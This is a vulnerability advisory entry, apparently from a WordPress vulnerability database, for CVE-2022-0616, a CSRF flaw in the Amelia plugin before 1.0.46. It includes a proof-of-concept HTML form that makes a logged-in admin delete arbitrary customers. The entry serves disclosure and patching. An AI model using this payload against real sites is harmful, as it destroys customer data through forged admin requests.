Amelia < 1.0.46 – Arbitrary Customer Deletion via CSRF | CVE 2022-0616 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when deleting customers, which could allow attackers to make a logged in admin delete arbitrary customers via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=wpamelia_api&call=/users/customers/delete/1" method="POST">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 1.0.46

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Muhamad Hidayat

Submitter

muhamad hidayat

Verified

Yes

WPVDB ID

7c63d76e-34ca-4778-8784-437d446c16e0

Timeline

Publicly Published

2022-02-23 (about 3 years ago)

Added

2022-02-23 (about 3 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2025-09-22

Title

SEO Backlink Monitor <= 1.6.0 - Cross-Site Request Forgery

Published

2025-04-18

Title

KiotViet Sync <= 1.8.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2021-08-09

Title

WordPress Download Manager < 3.2.13 - Email Template Setting Update via CSRF

Published

2024-06-27

Title

WP Mobile Menu < 2.8.4.4 - Cross-Site Request Forgery

Published

2022-10-13

Title

Page View Count < 2.5.6 - Settings Reset via CSRF